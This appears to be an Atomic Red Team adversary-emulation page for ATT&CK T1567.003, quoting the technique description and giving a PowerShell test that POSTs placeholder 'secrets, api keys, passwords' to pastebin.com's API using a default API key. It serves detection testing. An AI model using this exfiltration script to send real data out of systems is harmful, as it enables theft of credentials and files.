T1567.003 - Exfiltration Over Web Service: Exfiltration to Text Storage Sites
Description from ATT&CK (opens in a new tab)
Adversaries may exfiltrate data to text storage sites instead of their primary command and control channel. Text storage sites, such as
pastebin[.]com, are commonly used by developers to share code and other information.Text storage sites are often used to host malicious code for C2 communication (e.g., Stage Capabilities (opens in a new tab)), but adversaries may also use these sites to exfiltrate collected data. Furthermore, paid features and encryption options may allow adversaries to conceal and store data more securely.(Citation: Pastebin EchoSec)
Note: This is distinct from Exfiltration to Code Repository (opens in a new tab), which highlight access to code repositories via APIs.
Atomic Tests
Atomic Test #1 - Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows)
This test uses HTTP POST to exfiltrate data to a remote text storage site. (pastebin)
See https://web.archive.org/web/20201107203304/https://www.echosec.net/blog/what-is-pastebin-and-why-do-hackers-love-it (opens in a new tab)
Supported Platforms: Windows
auto_generated_guid: c2e8ab6e-431e-460a-a2aa-3bc6a32022e3
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| api_key | Pastebin API key | string | 6nxrBm7UIJuaEuPOkH5Z8I7SvCLN3OP0 |
Attack Commands: Run with powershell!
$apiKey = "#{api_key}"
$content = "secrets, api keys, passwords..."
$url = "https://pastebin.com/api/api_post.php"
$postData = @{
api_dev_key = $apiKey
api_option = "paste"
api_paste_code = $content
}
$response = Invoke-RestMethod -Uri $url -Method Post -Body $postData
Write-Host "Your paste URL: $response"